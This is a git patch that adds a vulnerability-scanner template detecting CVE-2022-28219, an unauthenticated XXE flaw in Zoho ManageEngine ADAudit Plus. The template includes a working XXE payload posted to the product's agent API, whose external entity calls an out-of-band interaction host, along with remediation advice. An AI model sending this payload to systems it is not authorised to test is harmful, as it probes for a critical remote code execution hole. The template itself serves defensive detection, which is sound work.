From b2a386d63699d4bb6a02c4ff6d4c7a8cf0c08de2 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <me@dw1.io>
Date: Thu, 30 Jun 2022 12:41:59 +0700
Subject: [PATCH] Add CVE-2022-28219 (#4705)

---
 cves/2022/CVE-2022-28219.yaml | 42 +++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 cves/2022/CVE-2022-28219.yaml

diff --git a/cves/2022/CVE-2022-28219.yaml b/cves/2022/CVE-2022-28219.yaml
new file mode 100644
index 0000000000..7af370ce26
--- /dev/null
+++ b/cves/2022/CVE-2022-28219.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-28219
+
+info:
+  name: Unauthenticated XXE to RCE in Zoho ManageEngine ADAudit Plus
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
+    unauthenticated XXE attack that leads to Remote Code Execution.
+    This template supports the detection part only, to achieve an
+    XXE to RCE, see reference[2].
+  reference:
+    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
+    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
+  remediation: |
+    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
+    is configured with a dedicated service account with restricted privileges.
+  tags: cve,cve2022,xxe,rce,zoho,manageengine
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/agent/tabs/agentData"
+    headers:
+      Content-Type: application/json
+    body: |
+      [
+        {
+          "DomainName": "{{Host}}",
+          "EventCode": 4688,
+          "EventType": 0,
+          "TimeGenerated": 0,
+          "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
+        }
+      ]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"